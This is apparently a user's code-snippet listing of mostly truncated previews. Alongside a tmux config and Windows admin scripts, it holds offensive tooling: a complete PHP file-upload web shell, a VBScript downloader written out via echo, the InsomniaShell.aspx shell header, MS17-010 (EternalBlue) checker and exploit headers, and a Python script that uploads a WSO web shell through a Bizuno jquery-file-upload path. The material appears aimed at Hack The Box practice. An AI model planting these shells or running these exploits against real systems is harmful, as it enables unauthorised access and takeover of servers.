islanddog

#Windows Update Force Bypass GPO
#Written by Dan, Jan 2019


#Intro
Write-Output "== wuforce =="
Write-Output "Checking Registry for GPO Settings..."

#First, set Windows Update to ignore GPO.
if (Test-Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU) {

islanddog

##This script checks for devices registered to AzureAD and removes them so you can successfully perform an AzureAD join.
# We recommend you backup your registry prior to running. We take no responisbility for the use of this script.
 
$sids = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\EnterpriseResourceManager\Tracked' -name |where-object {$_.Length -gt 25}
 
Foreach ($sid in $sids){
 
Write-host "Found a registered device. Would you like to remove the device registration settings for SID: $($sid)?" -ForegroundColor Yellow
$Readhost = Read-Host " ( y / n ) "
Switch ($ReadHost)

islanddog

#!/bin/bash

htbip=`ifconfig tun0 | grep -w "inet" | awk '{print $2}'`

mkdir www
echo "--------------------------------------------"
echo -e "Script Running - \e[41mBecause I'm really lazy.\e[0m"
echo -e "Updated 11.02.2020"
echo -e "\e[0m--------------------------------------------"
echo "Current HTB IP - $htbip"

islanddog

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs

islanddog

<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>

islanddog

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Security.Principal" %>
<%@ Import Namespace="System.Data.SqlClient" %>

<script runat="server">
//--------------------------------------------------------
//    INSOMNIA SECURITY :: InsomniaShell.aspx

islanddog

from mysmb import MYSMB
from impacket import smb, smbconnection, nt_errors
from impacket.uuid import uuidtup_to_bin
from impacket.dcerpc.v5.rpcrt import DCERPCException
from struct import pack
import sys

'''
Script for
- check target if MS17-010 is patched or not.

islanddog

#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time

'''
MS17-010 exploit for Windows 2000 and later by sleepya

islanddog

# Remap prefix to A
set -g prefix C-a
bind C-a send-prefix
unbind C-b

# Reload the file with Prefix r
bind r source-file ~/.tmux.conf \; display "Reloaded!"

# Quality of life stuff
set -g history-limit 10000

islanddog

#!/usr/bin/python
import requests
# Host IP http://IP
host='Put IP HERE'
# JQuery path for Bizuno Library 3.1.7
url=host+'/Books/apps/jquery-file-upload/server/php/index.php'
# Uploading the shell to the server. I use wso-4.2.5.php in this example:
files = {'files': open('wso-4.2.5.php', 'rb')}
r = requests.post(url, files=files)
# Location of Shell/Name - wso.php